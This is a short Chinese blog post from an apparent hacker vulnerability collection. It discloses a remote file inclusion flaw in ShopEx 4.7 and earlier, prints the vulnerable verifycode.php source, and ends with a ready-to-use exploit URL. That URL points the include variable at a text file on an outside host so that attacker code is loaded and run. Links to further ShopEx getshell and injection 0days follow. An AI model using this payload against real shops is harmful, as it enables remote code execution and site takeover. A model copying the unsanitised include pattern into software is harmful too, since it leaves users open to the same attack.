ShopEx PHP远程包含漏洞

2009, December 1, 7:28 PM. 漏洞集研
Submitted by admin

文章作者:寂寞hacker
信息来源:http://hi.baidu.com/isbx/

影响版本:4.7及以下

verifycode.php

<?php
/**
*
* 登陆验证码生成文件
*
* @package ShopEx网上商店系统
* @version 4.6
* @author ShopEx.cn <develop@shopex.cn>
* @url http://www.shopex.cn/
* @since PHP 4.3
* @copyright ShopEx.cn
*
**/
if (!defined("ISSHOP"))
{
Header("Location:../index.php");
exit;
}
/* 调用 session 文件 */
include_once($INC_SYSHOMEDIR."include/session.inc.php");

mt_srand((double)microtime() * 1000000);
/* 生成验证码 */
$strValidate = mt_rand(1000, 9999);
session_unregister("RANDOM_CODE");
session_register("RANDOM_CODE");
$_SESSION["RANDOM_CODE"] = $strValidate."";
$verifyImg = newclass("verifyCode", $strValidate);

/* 输出验证码图片 */
$verifyImg->Output();
?>

Exp: shop/verifycode.php?INC_SYSHOMEDIR=http://www.ynhacker.com/conn.txt?

Tags: shopex

« 上一篇 | 下一篇 »

只显示10条记录相关文章
shopex拿shell (浏览: 15539, 评论: 0)
shopex 注入 0day (4.8.5) (浏览: 10312, 评论: 0)
shopex 4.8.5.45144 getshell 囧版 0day (浏览: 10690, 评论: 0)
Shopex V4.8.4 V4.8.5 0Day 通杀+ 官方测试 (浏览: 16255, 评论: 0)
SHOPEX最新漏洞利用 (浏览: 10520, 评论: 0)
ShopEx 4.7.2 漏洞 (浏览: 13042, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):